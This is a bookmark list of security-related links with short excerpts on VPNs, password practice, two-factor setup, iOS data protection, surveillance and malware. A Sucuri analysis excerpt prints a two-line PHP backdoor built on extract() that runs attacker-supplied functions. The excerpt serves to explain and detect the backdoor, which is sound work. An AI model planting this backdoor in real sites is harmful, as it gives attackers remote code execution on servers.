aetles + security   92

Have I Been Pwned tells the world about security breaches
Troy Hunt’s Have I Been Pwned is a one-stop shop for learning if you’re among the millions affected by security breaches. And he’s trying to do it the responsible way.
passwords  security  hacking 
9 weeks ago by Aetles
drduh/macOS-Security-and-Privacy-Guide: A practical guide to securing macOS.
This guide is a collection of thoughts on and techniques for securing a modern Apple Mac computer ("MacBook") using macOS (formerly known as OS X) version 10.12 "Sierra", as well as steps to generally improving privacy.

This guide is targeted to “power users” who wish to adopt enterprise-standard security, but is also suitable for novice users with an interest in improving their privacy and security on a Mac.

A system is only as secure as its administrator is capable of making it. There is no one single technology, software, nor technique to guarantee perfect computer security; a modern operating system and computer is very complex, and requires numerous incremental changes to meaningfully improve one's security and privacy posture.
mac  macos  security  osx  privacy 
january 2018 by Aetles
Quad 9 | Internet Security and Privacy in a Few Easy Steps
Quad9 is a free, recursive, anycast DNS platform that provides end users robust security protections, high-performance, and privacy. 

Security: Quad9 blocks against known malicious domains, preventing your computers and IoT devices from connecting malware or phishing sites. Whenever a Quad9 user clicks on a website link or types in an address into a web browser, Quad9 will check the site against the IBM X-Force threat intelligence database of over 40 billion analyzed web pages and images. Quad9 also taps feeds from 18 additional threat intelligence partners to block a large portion of the threats that present risk to end users and businesses alike. 

Performance: Quad9 systems are distributed worldwide in more than 70 locations at launch, with more than 160 locations in total on schedule for 2018. These servers are located primarily at Internet Exchange points, meaning that the distance and time required to get answers is lower than almost any other solution. These systems are distributed worldwide, not just in high-population areas, meaning users in less well-served areas can see significant improvements in speed on DNS lookups. The systems are “anycast” meaning that queries will automatically be routed to the closest operational system. 

Privacy: No personally-identifiable information is collected by the system. IP addresses of end users are not stored to disk or distributed outside of the equipment answering the query in the local data center. Quad9 is a nonprofit organization dedicated only to the operation of DNS services. There are no other secondary revenue streams for personally-identifiable data, and the core charter of the organization is to provide secure, fast, private DNS. 
dns  privacy  security  Internet 
november 2017 by Aetles
Let them paste passwords - NCSC Site
This is why we think SPP is bad, and allowing password pasting is good. The pros outweigh the cons, and by a lot.
forms  javascript  passwords  security  webdevelopment 
may 2017 by Aetles
Theft and Loss Recovery for iOS Users — Fraser Speirs
Let's say, for the sake of argument, that I'm walking down the street in a large city somewhere abroad and I'm approached and forcibly relieved of all the valuable possessions on my person. In a typical tech conference scenario, that would be my iPhone, iPad and Apple Watch all gone.

What now? Well, there are two phases to this: damage limitation and disaster recovery.
security  ios  backup  passwords  icloud  apple  twostepverification 
april 2017 by Aetles
Your Regular WordPress Maintenance Checklist — SitePoint
Here’s a collection of WordPress maintenance checklists for you. Do them regularly, and your site will be speedy and secure. Neglect them, and bad things may happen:

Your site may load as slow as treacle.
Important functionality might break into a hundred pieces.
Your visitors’ computers may be infected with malware.
Your site may be be delisted from search engines.
So keep on top of your maintenance. Do it regularly, and it won’t take long.
wordpress  security  maintenance  webdevelopment 
april 2017 by Aetles
PPTP vs L2TP vs OpenVPN vs SSTP vs IKEv2 -
With Edward Snowden’s shocking revelations that the NSA has for years been working to crack and subvert VPN encryption technologies, together with the fact that it is becoming increasingly obvious that most such technologies have been developed and certified by the US government’s National Institute of Standards and Technology (NIST) and may therefore be considered suspect, we have decided it is time to revisit and update this popular article.

We will start with a rundown of the major differences between the different VPN protocols and how they affect you, before looking in more detail at the key concepts involved in cryptography, and how the NSA’s assault on encryption standards affects VPN users.

The discussion below is rather technical, and although I have made every effort to make it as approachable as possible, you may prefer to just jump to the end of the article for a quick summary.
security  vpn 
april 2017 by Aetles
trailofbits/algo: Set up a personal IPSEC VPN in the cloud
Algo VPN is a set of Ansible scripts that simplify the setup of a personal IPSEC VPN. It uses the most secure defaults available, works with common cloud providers, and does not require client software on most devices.
linux  security  vpn 
april 2017 by Aetles
Protecting Your Data at a Border Crossing – Zdziarski's Blog of Things
Once policies that require surrendering passwords (I’ll call them password policies from now on) are adopted, the obvious intelligence benefit will no doubt inspire other countries to establish reciprocity in order to leverage receiving better intelligence about their own citizens traveling abroad. It’s likely the US will inspire many countries, including oppressive nations, to institute the same password policies at the border. This will ultimately be used to skirt search and seizure laws by opening up your data to forensic collection. In other words, you don’t need Microsoft to service a warrant, nor will the soil your data sits on matter, because it will be a border agent connecting directly your account with special software throug the front door.

I am not a lawyer, and I can’t provide you with legal advice about your rights, or what you can do at a border crossing to protect yourself legally, but I can explain the technical implications of this, as well as provide some steps you can take to protect your data regardless of what country you’re entering. Disclaimer: You accept full responsibility and liability for taking any of this information and using it
security  privacy  travel 
february 2017 by Aetles
Decent Security
This is a guide to maintenance for Windows 7 and higher. Although this isn't a computer disinfection guide, it will remove many viruses and repair their damage.

All of these tasks have been performed by me or my scripts across tens, hundreds, or over a thousand computers. You can read my qualifications here.

The order of these steps is purposeful. For example - uninstalling some programs, running a temp file clean, and rebooting can leave them in a broken state.
malware  security  windows  antivirus 
november 2016 by Aetles
TunnelBear: Secure VPN Service
Simple, private, free access to the open Internet you 
Get Started, It's Free
Simple privacy apps for Mac & all your devices
mac  vpn  security 
september 2016 by Aetles
"Wrong Way" security problem exposes VPN users' real IP
Another VPN security problem was found: “Wrong Way” may reveal the user’s real IP address like “Port Fail“. This time are not only providers with port forwarding affected but rather all providers, they havn’t fixed the problem. The underlying problem is that packets received over the real IP will be answered via the VPN interface under certain conditions.
security  vpn  mac  osx 
december 2015 by Aetles
System Integrity Protection – Adding another layer to Apple’s security model | Der Flounder
System Integrity Protection

To limit what the superuser can do and add another layer to OS X’s security model, Apple has developed SIP and deployed it as part of OS X El Capitan. SIP is designed to limit the power of root and to protect the system even from the superuser. For more details, see below the jump.

SIP is an overall security policy with the goal of preventing system files and processes from being modified by third parties. To achieve this, it has the following concepts:

File system protection
Runtime protection
Kernel extension protection
apple  osx  security  elcapitan 
december 2015 by Aetles
Sucuri SiteCheck - Free Website Malware Scanner
Enter a URL (ex. and the Sucuri SiteCheck scanner will check the website for known malware, blacklisting status, website errors, and out-of-date software.
malware  security  scanner  wordpress 
september 2015 by Aetles
Creating a kill-switched VPN on Mac with PIA and Little Snitch
In this post, I describe why, after years of using the wonderful Mac/iOS VPN product, Cloak, I’m experimenting with an alternative approach, that combines Private Internet Access (PIA) and Little Snitch.
apple  network  security  vpn  osx 
august 2015 by Aetles
Fairly Random Thoughts on Ashley Madison & the Swiftly Moving Line — The Message — Medium is an online personals service that enables people who want to have extramarital affairs to find each other and, presumably, to do sex things with each other. Its core value, as expressed through its branding and advertising, is discretion. One of the services it offers is that, for a fee, it will erase your account and all record of your account.

The Impact Team is an individual or group that targeted AshleyMadison and, according to Krebs on Security, downloaded the information on 37 million accounts. According to that article, the Impact Team is angry because the erase-your-account feature doesn’t really erase your account. It wants the company that controls AshleyMadison, Avid Life Media of Toronto, to shut down, or it will continue to release information on its users. Its core value appears to be really messing up Avid Life Media’s world.

This is a weird situation. A lot of lives are going to be changed if this information comes out and is publicly accessible.

This piece is just a riff, or what we used to call a “blog post.” I’m going to throw out a few things that I’ve read about and not draw any particular conclusions. Then I’m going to write about a technical idea for making databases more secured, that might have helped AshleyMadison avoid this situation. This is not even a thinkpiece, because I don’t know what I think.
security  privacy  hacking  database  Internet 
july 2015 by Aetles
Chatting in Secret While We're All Being Watched
When you pick up the phone and call someone, or send a text message, or write an email, or send a Facebook message, or chat using Google Hangouts, other people find out what you’re saying, who you’re talking to, and where you’re located. Such private data might only be available to the service provider brokering your conversation, but it might also be visible to the telecom companies carrying your Internet packets, to spy and law enforcement agencies, and even to some nearby teenagers monitoring your Wi-Fi network with Wireshark.

But if you take careful steps to protect yourself, it’s possible to communicate online in a way that’s private, secret and anonymous. Today I’m going to explain in precise terms how to do that. I’ll take techniques NSA whistleblower Edward Snowden used when contacting me two and a half years ago and boil them down to the essentials. In a nutshell, I’ll show you how to create anonymous real-time chat accounts and how to chat over those accounts using an encryption protocol called Off-the-Record Messaging, or OTR.

If you’re in a hurry, you can skip directly to where I explain, step by step, how to set this up for Mac OS X, Windows, Linux and Android. Then, when you have time, come back and read the important caveats preceding those instructions.
security  tor  privacy  surveillance  chat  mac  osx 
july 2015 by Aetles
Using Little Snitch to prevent internet access without VPN
There are a couple reasons why you would want to access the internet through a VPN: your work requires it, you regularly work from open Wifi networks, at hotels, coffee shops or libraries, and you want to prevent eavesdropping.

This article presents a simple technique that allows you to force internet access through a VPN when using unsafe networks. I will use Private Internet Access as an example, but this applies to any VPN connection, on any network.


Modify rules in default profile to deny all connections.
Create a “VPN” profile that allows all connections.
Let “Automatic Profile Switching” do the rest.
mac  security  osx  vpn  privacy  encryption  wifi  internet 
june 2015 by Aetles
GRC's | Password Haystacks: How Well Hidden is Your Needle?  
Every password you use can be thought of as a needle hiding in a haystack. After all searches of common passwords and dictionaries have failed, an attacker must resort to a “brute force” search – ultimately trying every possible combination of letters, numbers and then symbols until the combination you chose, is discovered.

If every possible password is tried, sooner or later yours will be found.
The question is: Will that be too soon . . . or enough later?

This interactive brute force search space calculator allows you to experiment with password length and composition to develop an accurate and quantified sense for the safety of using passwords that can only be found through exhaustive search. Please see the discussion below for additional information.
passwords  security  privacy  tools 
april 2015 by Aetles
Exploit Exercises provides a variety of virtual machines, documentation and challenges that can be used to learn about a variety of computer security issues such as privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering, and general cyber security issues.
hacking  security  games 
april 2015 by Aetles
How to safely use a public Wi-Fi network
Wi-Fi networks in cafés, trains and other public places are inherently insecure. What measures can train passengers or patrons of sidewalk cafés take to protect themselves?
security  wifi  privacy  hacking 
october 2014 by Aetles
What we give away when we log on to a public Wi-Fi network
We took a hacker to a café and, in 20 minutes, he knew where everyone else was born, what schools they attended, and the last five things they googled.
security  wifi  privacy  hacking 
october 2014 by Aetles
Counter-Forensics: Pair-Lock Your iOS 7 Device with Apple’s Configurator | Jonathan Zdziarski's Domain
So what’s the best way to protect yourself from all of these? Pair-lock your device. By pair-locking your device, you’re preventing anyone from dumping data from your phone, installing malicious applications, or doing anything else to it – even if the phone leaves your physical possession, and even if you are forced to give up the PIN code, or unlock it with your fingerprint. When a device is unwilling to create a new pairing session with a desktop machine, nothing can talk to it through its proper interfaces – not forensics tools, not iMobileDevice tools, nothing. And that means unless you have a really old phone with a hardware exploit, there’s no way they’ll be able to dump data from it. In order for them to get at your data, they’d have to steal the pairing record that your own personal desktop has created for the device; if your’e smart enough to be reading this, you’re likely smart enough to also encrypt your hard drive. On a Mac, you’ll find a copy of your pairing record in /var/db/lockdown. Guard it well.
apple  ios  iphone  security 
september 2014 by Aetles
The Start-to-Finish Guide to Securing Your Cloud Storage
There's no such thing as perfect security, but that's no excuse to do nothing, especially when boosting your security is easy. Don't fall for the trope that "if you want it secure you shouldn't store it in the cloud." Cloud storage is a convenient, accessible technology that gives us access to our data anywhere, on multiple devices. It helps us work and makes our lives easier. There's a line to be sure, but it's silly to not use useful technologies simply because of the risk that something bad might happen. Let's talk about how you can mitigate that risk.
cloud  dropbox  security  privacy 
september 2014 by Aetles
Setting up firmware password protection in OS X | Cocktail Blog
Mac users in higher security risk situations may wish to enable an optional firmware password on their machines, which offers an advanced level of protection. In short, a firmware password is a lower level layer of security that is set on the actual Mac logicboards firmware, rather than at the software layer like FileVault encryption or the standard login password.
mac  osx  mactips  security  passwords 
june 2014 by Aetles
Which VPN Services Take Your Anonymity Seriously? 2014 Edition | TorrentFreak
Millions of people use a VPN service to protect their privacy, but not all VPNs are as anonymous as one might hope. In fact, some VPN services log users' IP-addresses for weeks. To find out how secure VPNs really are TorrentFreak asked the leading providers about their logging policies, and more.

By now most Internet users are well aware of the fact that pretty much every step they take on the Internet is logged or monitored.

To prevent their IP-addresses from being visible to the rest of the Internet, millions of people have signed up to a VPN service. Using a VPN allows users to use the Internet anonymously and prevent snooping.

Unfortunately, not all VPN services are as anonymous as they claim.

Following a high-profile case of an individual using an ‘anonymous’ VPN service that turned out to be not so private, TorrentFreak decided to ask a selection of VPN services some tough questions.

By popular demand we now present the third iteration of our VPN services “logging” review. In addition to questions about logging policies we also asked VPN providers about their stance towards file-sharing traffic, and what they believe the most secure VPN is.
vpn  privacy  security  anonymity 
june 2014 by Aetles
Your iOS device isn’t as encrypted as you think | Jonathan Zdziarski's Domain
So what’s the problem? Well, as of even the latest versions of iOS, the only files protected with this secondary encryption is your mail index, the keychain itself, and third party application files specifically tagged (by the developer) as protected with Data-Protection. Virtually everything else (your contacts, SMS, spotlight cache, photos, and so on) remain unprotected. To demonstrate this, I’ve put together a small recipe you can run on your own jailbroken device to bypass the lock screen. You can then use the GUI to browse through all of the data on the device, without ever providing your PIN. The only thing you’ll not be able to access are the files I’ve just mentioned. This lock screen bypass isn’t really a vulnerability in and of itself; it’s just one of many ways I can demonstrate to you that you don’t need a passphrase to view a vast majority if the data on your phone.
ios  security  hacking  encryption 
may 2014 by Aetles
Should I Change My Password? | How Safe Is Your Password?
What is Should I Change My Password all about?

Avalanche Technology Group is proud to bring you Should I Change My Password, a service that allows you to check anonymously if your password has been compromised.

We comb the depths of the internet to find email and password data sets that have been hacked, leaked or compromised. We aggregate this data so that you can easily check whether your email addresses and passwords have been included in any of these breaches.

By signing up for an Email Watchdog account, you will be immediately notified if any of your email addresses are identified in future breaches. This means that you can change your passwords as soon as possible, preventing opportunistic hackers from accessing your accounts.
Learn more about the Email Watchdog.

We currently have over 203 Million email addresses which have been released by hackers, and this list continues to grow.
hack  password  security  privacy 
april 2014 by Aetles
Phishing with plain text emails
It looks like plain text, but it's actually HTML with unstyled text and more text hidden in between: try copying and pasting the links from these two examples and see for yourself.
phishing  security  mail  email 
march 2014 by Aetles
TidBITS: How to Protect Your iCloud Keychain from the NSA
Apple has released a massive update to its “iOS Security” white paper for IT professionals. It contains more information on iOS security than Apple has ever shared publicly before, including extensive details on Touch ID, Data Protection, network security, application security, and nearly all security-related features, options, and protective controls.

For the first time, we have extensive details on iCloud security. For security professionals like myself, this is like waking up and finding a pot of gold sitting on my keyboard. Along with some of the most impressive security I’ve ever seen, Apple has provided a way to make it impossible for agencies like the NSA to obtain your iCloud Keychain passwords.

The paper is incredibly dense, even getting to the level of detail of which flavor of particular encryption algorithms are used in which security controls. I will likely be digesting it for months, but one particular section contained an important nugget that explains why the NSA can’t snoop on your iCloud Keychain passwords.
apple  ios  security 
march 2014 by Aetles
PHP Backdoors: Hidden With Clever Use of Extract Function | Sucuri Blog
Recently while working on a client website, one of our security analysts, Ben Martin, found a very interesting backdoor that leverages the extract PHP function. The backdoor was hidden on a file called phpinfo.php:

@extract ($_REQUEST);
@die ($ctime($atime));

It is extracting any content sent via GET or POST requests and creating variables for them. That means that in the next part of the code, where it executes “die” (exit) on $ctime($atime), it is actually executing whatever the attacker sends as “ctime” with “atime” as an argument.
php  security  hacking 
february 2014 by Aetles
StartSSL™ Certificates & Public Key Infrastructure - StartSSL™ Free
The StartSSL™ Free (Class 1) certificates are domain or email validated and mostly referred to as the free certificates. Because the checks are performed mostly by electronic means, they require only minimal human intervention from our side. The validations are here to make sure, that the subscriber is the owner of the domain name, resp. email account. You may find additional information on this subject in our CA policy.

The StartSSL™ Free certificates are intended for web sites which require protection of privacy and prevent eavesdropping. However information presented within these certificates, except the domain name and email address, are not verified. Should you need higher validated certification, please check out our StartSSL™ Verified (Class 2) certificates.

The StartCom Certification Authority, provides the StartSSL™ Free certificates instantly, without limitations and free of charge under the condition, that the subscriber provides his/her complete, correct personal details and accepts the Subscriber Obligations of the StartCom CA Policy. Secure your web server and mail traffic now by using the Certificate Control Panel.
security  server  ssl  certificate  webdevelopment  webserver 
january 2014 by Aetles
Malware Hidden Inside JPG EXIF Headers | Sucuri Blog
A few days ago, Peter Gramantik from our research team found a very interesting backdoor on a compromised site. This backdoor didn’t rely on the normal patterns to hide its content (like base64/gzip encoding), but stored its data in the EXIF headers of a JPEG image. It also used the exif_read_data and preg_replace PHP functions to read the headers and execute itself.
backdoor  php  security  jpeg 
january 2014 by Aetles
On Hacking MicroSD Cards « bunnie's blog
Today at the Chaos Computer Congress (30C3), xobs and I disclosed a finding that some SD cards contain vulnerabilities that allow arbitrary code execution — on the memory card itself. On the dark side, code execution on the memory card enables a class of MITM (man-in-the-middle) attacks, where the card seems to be behaving one way, but in fact it does something else. On the light side, it also enables the possibility for hardware enthusiasts to gain access to a very cheap and ubiquitous source of microcontrollers.
hacks  security  hardware  memory  hacking 
december 2013 by Aetles
Fake femme fatale dupes IT guys at US government agency | Naked Security
Lakhani pointed out a few lessons from the experiment:

Attractive women can open locked doors in the male-dominated IT industry. A parallel test with a fake male social media profile resulted in no useful connections. A majority of those who offered to help Emily Williams were men. The gender disparity in social engineering has shown up in other situations, including, for example, the 2012 Capture the Flag social engineering contest at Defcon. Anecdotal evidence from the Defcon contest suggested that females might have more compunction than males about duping others, but they may be better at sniffing out a con.
People are trusting and want to help others. Unfortunately, low-level employees don't always think that they could be targets for social engineering because they're not important enough in the organization. They're often unaware of how a simple action like friending somebody on Facebook, for example, could help attackers establish credibility.
security  privacy  hacking 
november 2013 by Aetles
Trick and Treat: The New 1Password Emergency Kit — Productivityist
Clearly this isn't something we plan for, but it can happen. So why not prepare accordingly? With 1Password there to help you with password security and retention, you'll be able to help ease even a little bit of the stress and pain that comes with any sort of emergency that might incapacitate you. This kit -- which is now two full pages -- allows you to print off the information that will be required in the instance that you are not able to offer that information yourself. Whatever kind of thing you classify as an emergency, with 1Password and The 1 Password Emergency Kit prepared you'll have done your due diligence.
security  1password 
november 2013 by Aetles
GRC's | SQRL Secure QR Login  
Summarizing this for your next cocktail party: “The website's login presents a QR code containing the URL of its authentication service, plus a nonce. The user's smartphone signs the login URL using a private key derived from its master secret and the URL's domain name. The Smartphone sends the matching public key to identify the user, and the signature to authenticate it.”
security  privacy  cryptography  authentication 
october 2013 by Aetles
NSA surveillance: how to stay secure | Bruce Schneier | World news |
Now that we have enough details about how the NSA eavesdrops on the internet, including today's disclosures of the NSA's deliberate weakening of cryptographic systems, we can finally start to figure out how to protect ourselves.

For the past two weeks, I have been working with the Guardian on NSA stories, and have read hundreds of top-secret NSA documents provided by whistleblower Edward Snowden. I wasn't part of today's story – it was in process well before I showed up – but everything I read confirms what the Guardian is reporting.

At this point, I feel I can provide some advice for keeping secure against such an adversary.
security  encryption  privacy  surveillance 
september 2013 by Aetles
Errata Security: The Rob Test: 12 Steps to Safer Code
Joel Spolsky has a famous list of "12 Steps to Better Code". I thought I'd create a similar list for safer, more secure code that's resilient against hackers.

The Rob Test
1. Do you use source control, bug tracking, and planning (i.e. GitHub basics)?
2. Do you have automated (one step, daily) builds?
3. Do you have automated regression/unit testing? Can you fix/release in 24 hours?
4. Do you reward testers for breaking things? (like fuzz testing)
5. Do your coders know basic vulns? (buffer-overflows, OWASP Top 10) Do you train them? Do you test new hires?
6. Do you know your attack surface? threat model?
7. Do you sniff the wire to see what's going on? (including sslstrip)
8. Do you have detailed security specifications as part of requirements/design?
9. Do you ban unsafe practices? (strcpy, SQL pasting, clear-text)
10. Do you perform regular static/dynamic analysis on code?
11. Do you have, and practice, an incident response plan? (secure@, bounties, advisories, notification)
12. Are your processes lightweight and used, or heavyweight and ignored?
security  development  programming 
august 2013 by Aetles
How-to: Strengthen your iOS device’s security with a multi-numeric passcode | 9to5Mac
While many of us know about and use the simple four digit passcode or more complex alphanumeric passcode to secure the data on our iOS devices, I recently discovered an interesting option built right into the system that I find to be more secure than a simple passcode and more convenient than an alphanumeric passcode.

As mentioned in a recent episode of the Mac Power Users podcast, you can make your passcode more complex without complicating it by using more than 4 digits without involving letters and still using the num pad.
ios  security  passcode 
august 2013 by Aetles
RaiderSec: How Browsers Store Your Passwords (and Why You Shouldn't Let Them)
In a previous post, I introduced a Twitter bot called dumpmon which monitors paste sites for account dumps, configuration files, and other information. Since then, I've been monitoring the information that is detected. While you can expect a follow-up post with more dumpmon-filled data soon, this post is about how browsers store passwords.

I mention dumpmon because I have started to run across quite a few pastes like this that appear to be credential logs from malware on infected computers. It got me thinking - I've always considered it best to not have browsers store passwords directly, but why? How easy can it be for malware to pull these passwords off of infected computers? Since sources are a bit tough to find in one place, I've decided to post the results here, as well as show some simple code to extract passwords from each browser's password manager.
security  browsers  passwords 
june 2013 by Aetles
iCloud users take note: Apple two-step protection won’t protect your data | Ars Technica
"To me the story here is all about Apple offering a 2FA [two-factor authentication] solution that doesn't really add much extra security for you (files, documents etc), but it protects them (and you) from unauthorized money transactions and changes to your account," Per Thorsheim, a security consultant in Oslo, Norway, wrote in an e-mail to Ars. "People are not made aware of this at all, and it will be a false layer of security when people enable 2FA and put sensitive and secret documents into iCloud."

He continued:

"People EXPECT a 2FA solution to add additional security in order to protect their data, but contrary to Dropbox & Google, Apple doesn't really do that. It's the 'weakest' 2FA solution launched so far by the big and well-known services, it will only add an additional layer of false security to people's minds, which may have dangerous results."
apple  icloud  security  twostepverification 
june 2013 by Aetles
Anatomy of a hack: How crackers ransack passwords like “qeadzcwrsfxv1331” | Ars Technica
In March, readers followed along as Nate Anderson, Ars deputy editor and a self-admitted newbie to password cracking, downloaded a list of more than 16,000 cryptographically hashed passcodes. Within a few hours, he deciphered almost half of them. The moral of the story: if a reporter with zero training in the ancient art of password cracking can achieve such results, imagine what more seasoned attackers can do.

Imagine no more. We asked three cracking experts to attack the same list Anderson targeted and recount the results in all their color and technical detail Iron Chef style. The results, to say the least, were eye opening because they show how quickly even long passwords with letters, numbers, and symbols can be discovered.

The list contained 16,449 passwords converted into hashes using the MD5 cryptographic hash function. Security-conscious websites never store passwords in plaintext. Instead, they work only with these so-called one-way hashes, which are incapable of being mathematically converted back into the letters, numbers, and symbols originally chosen by the user.
passwords  security  privacy  cryptography 
may 2013 by Aetles
The Mailbox security failure that wasn’t |
This can cause some confusion when somebody plugs a locked device into a computer it has previously been plugged in to. The misconception is that because a locked device is plugged into a computer and the contents of the device are readable, that the contents of that device would be readable on any computer that the device is plugged in to; but this is not reality. If you were to lose your phone on the street, then somebody else picked it up, took it home, plugged it into their computer and fired up iExplorer, they would just see a screen telling them to plug in a device. iExplorer has no way to talk to that device until the device has been unlocked, plugged into the computer, and the keys have been exchanged. You can reproduce this behavior on a computer that the device has already been plugged into by going to the '/private/var/db/lockdown' directory on the computer ('%AllUsersProfile%\Apple\Lockdown\' in Windows) and deleting the plist file in that directory that has your device’s UDID in the filename.
apple  ios  security 
may 2013 by Aetles
[1304.6584] When Privacy meets Security: Leveraging personal information for password cracking
Passwords are widely used for user authentication and, despite their weaknesses, will likely remain in use in the foreseeable future. Human-generated passwords typically have a rich structure, which makes them susceptible to guessing attacks. In this paper, we study the effectiveness of guessing attacks based on Markov models. Our contributions are two-fold. First, we propose a novel password cracker based on Markov models, which builds upon and extends ideas used by Narayanan and Shmatikov (CCS 2005). In extensive experiments we show that it can crack up to 69% of passwords at 10 billion guesses, more than all probabilistic password crackers we compared again t. Second, we systematically analyze the idea that additional personal information about a user helps in speeding up password guessing. We find that, on average and by carefully choosing parameters, we can guess up to 5% more passwords, especially when the number of attempts is low. Furthermore, we show that the gain can go up to 30% for passwords that are actually based on personal attributes. These passwords are clearly weaker and should be avoided. Our cracker could be used by an organization to detect and reject them. To the best of our knowledge, we are the first to systematically study the relationship between chosen passwords and users' personal information. We test and validate our results over a wide collection of leaked password databases.
passwords  security  research 
april 2013 by Aetles
Setting up Two-Factor Authentication for your Google account AND Microsoft account - Scott Hanselman
I use Two-Factor Authentication for my Google Apps account and I use the Google Authenticator application on my iPhone to generate the second factor.

Microsoft Accounts (formerly Live Accounts) just launched Two-Factor Auth and you should set it up now. That means SkyDrive, as well as the Windows Azure Dashboard can now be fronted by two-factor auth.

If you already use two-factor for Google, you can ADD your Microsoft account to the Google Authenticator application on your Android or iPhone. That means I can use one Authenticator application for all accounts which is extremely convenient.
google  microsoft  security  twostepverification 
april 2013 by Aetles
On hashcat and strong Master Passwords as your best protection | Agile Blog
You may have heard some news going around about hashcat, a password cracking tool, that recently increased its ability to guess Master Passwords for 1Password data files. It’s an impressive achievement for hashcat, and it is important to understand what this does and doesn’t mean for 1Password.
passwords  security  1password  encryption 
april 2013 by Aetles
Free Access To Dozens of Anonymous VPNs Via New University Project | TorrentFreak
The Graduate School of University of Tsukuba, Japan, has just launched the VPN Gate Academic Experiment Project with the aim “to expand the knowledge of Global Distributed Public VPN Relay Servers.” We’re very happy to help them with that today.

How it works

Volunteers have given the University access to dozens of VPN servers located all over the world which people can access from pretty much any device running Windows, Linux, iOS, Android and more. No sign up or user registration is needed. Once connected the user’s IP address is hidden and switched for one issued by the VPN of their choice selected from dozens around the world.
security  vpn  privacy  anonymity 
march 2013 by Aetles
Protecting Drupal's fleshy underbelly with .htaccess | Acquia
In this article, I’m going to show you a few methods to separate your public site from the vulnerable parts of your administration area. What you need is an effective way to keep your site locked and secure, and protected from attacks, while still leaving your site editable for trusted users.

Methods for securing the admin section of your site
One of the things that is often overlooked when setting up and securing a Drupal site is the administrative sections. Sure, Drupal protects these paths with access controls but you can do a lot more to protect your site, especially if your site doesn’t require public login.

If the public has no business accessing /user, they shouldn’t be able to. This path is an attack vector for denial of service (DDoS), brute force password guessing, and it drastically increases attack surface of the site.
drupal  security 
march 2013 by Aetles
Hacking the <a> tag in 100 characters
A short while ago, I discovered that JavaScript allows you to change the <a> href after you click on it. It may not seem that serious at first glance, but rest assured, it can trick customers into giving in their details to fraudsters.

Let me show you an example. This link should take you to PayPal.
html  javascript  phishing  security 
march 2013 by Aetles
Is your browser configuration rare or unique? If so, web sites may be able to track you, even if you limit or disable cookies.

Panopticlick tests your browser to see how unique it is based on the information it will share with sites it visits. Click below and you will be given a uniqueness score, letting you see how easily identifiable you might be as you surf the web.
browser  eff  security  privacy  tracking 
march 2013 by Aetles
Muffett on Passwords | dropsafe
TL;DR Summary

don’t let users choose guessable passwords; achieve this by…
encouraging/forcing users to use good password management software, and then…
protect the hashes on the backend by using something decent, ie: bcrypt()
passwords  security 
january 2013 by Aetles
Regrettably @Mat Honan is Entirely Wrong about “Killing Passwords” /cc @Wired | dropsafe
The reason to cling onto passwords is that they are a distributed, non-hierarchical technology.

There is no database other than the essential database of passwords
There is no certificate authority to be spoofed
There is no token database to be stolen
There is no monetisable identity linkage and hence no selective disclosure bunfighting
The likelihood of catastrophic centralised identity mistakes is small
In short: there’s a lot less that can go wrong when the identities are discrete and thinly spread.

So, sorry Mat. You’re wrong all the way up to this point
passwords  security  mathonan 
january 2013 by Aetles
Israel rejects US gun lobby claims on its security
America's top gun lobbyist has his facts wrong when he holds up Israel's stationing of armed guards at all schools as a model of how to avoid another massacre like the Dec. 14, 2012 slaughter of 20 first-graders and six adults at a Connecticut elementary school. What's more, the gun laws in Israel, a country where most people serve in the military, are far more onerous than those in the U.S., containing restrictions that would be anathema to the National Rifle Association and its members.
guns  guncontrol  security  world  usa 
december 2012 by Aetles
Secure Yourself by Using Two-Step Verification on These 16 Web Services - How-To Geek
Two-factor authentication, also known as 2-step verification, provides additional security for your online accounts. Even if someone discovers your password, they’ll need a special one-time code to log in after you enable two-factor authentication on these services.

Notably absent from this list are banks and other financial institutions. It’s a shame that you can use two-factor authentication to protect your in-game currency in an MMORPG, but not the real money in your bank account.
security  twostepverification  passwords 
december 2012 by Aetles
Most web sites ask for a password when you register. After logging in, you can access the site until your session expires. When you forget your password, you can request an email with a link to a password change form. NoPassword factors out the password from this process. You register with an email address and receive a link that gives you a session on that browser until you log out. If you ever need to log in from somewhere else, you can request another email with a link that will log you in wherever you are.
email  passwords  security  tools  authentication 
september 2012 by Aetles
Charlie Miller Takes on NFC, Charlie Miller Wins | threatpost
The Nexus S runs on Android and Miller used the technique, along with a known vulnerability in an older version of the OS to perform the attack. He demonstrated the technique, along with another attack that leverages NFC, during a talk at the Black Hat conference here Wednesday. He can use that Android attack in order to point the user's device to a malicious Web site and then gain complete control of the phone.
All of this by just standing close by or bumping into a victim. The bug in Android that Miller exploits in his attack has been fixed in current versions of Android, but many carriers are slow to push new versions to users, who are, in turn, slow to install updates.

In addition to the work on Nexus S, Miller also did some research on the way that the Nokia N9 Meego operating system handles Bluetooth connections. Under the default settings on the device, Miller found that he could force the phone to pair with any device over Bluetooth by presenting the phone with an NFC tag. The attack works even if the user has Bluetooth pairing disabled on the device, because the phone will allow pairing via NFC.

Once the device is paired with the attacker's phone, the attacker can get complete access to everything on the N9.
nfc  android  hacker  security 
september 2012 by Aetles
ssh - How can I use a passcode generator for authentication for remote logins? - Ask Ubuntu
I would like to strengthen the authentication of my SSH logins by adding another factor: a passcode generator device, or a passcode generation application on my mobile phone. The only obvious options in the default setup are a fixed password and key pair. How can I do this?

(If I use a password plus a passcode generator, this provides two-factor authentication (2FA): the password is “what I know”, and the passcode is “what I have”.)
twofactorauthentication  ssh  googleauthenticator  twostepverification  2fa  iphone  security 
august 2012 by Aetles
Two Factor SSH with Google Authenticator
Last week, Google enabled two factor authentication for everyone. This article explains how to install and configure Google Authenticator in conjunction with SSH for two factor authentication. Two-factor authentication relies on something you know (a password) and something you have (your phone).
google  linux  security  ssh  twostepverification 
august 2012 by Aetles
Eikon Mini, the Compact, Low-cost USB Fingerprint Reader for Today’s PCs and Macs
Passwords On the Go
Almost invisible, keep it plugged-in or carry it with you and use your fingerprint as your master password. The Eikon Mini is the most user friendly, ultra-portable fingerprint reader available.
security  passwords  osx  fingerprints 
july 2012 by Aetles
Red Sweater Blog – Keychain Password Search
Update: As luck would have it, mere moments after publishing this, I got word from the 1Password folks about another write-up that achieves something different (exporting for 1Password), but makes use of the very same approach of automating the clicking of that allow button.
passwords  security  osx  keychain  1password 
june 2012 by Aetles
Confirmed: US and Israel created Stuxnet, lost control of it | Ars Technica
